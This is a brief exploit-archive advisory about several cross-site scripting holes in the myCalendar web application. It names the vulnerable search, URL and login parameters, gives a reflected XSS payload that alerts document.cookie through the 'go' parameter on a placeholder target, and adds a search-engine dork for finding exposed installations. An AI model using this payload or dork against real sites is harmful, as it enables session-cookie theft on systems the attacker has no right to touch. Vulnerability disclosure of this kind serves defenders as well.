MyCalendar multiple XSS
By : sn0oPy
Risk : medium
exploit :
XSS on the search menu : http://www.target.ma/calendar/index.php?go=search
XSS on the url : http://www.target.ma/calendar/index.php?go="><script>alert(document.cookie)</script>
XSS on the username and password at http://www.target.ma/crown/cal/index.php?go=Login
dork : intitle:"myCalendar"
contact : [email protected]
greetz : [subzero], Avg Team.
Reference : http://forums.avenir-geopolitique.net/viewtopic.php?t=2686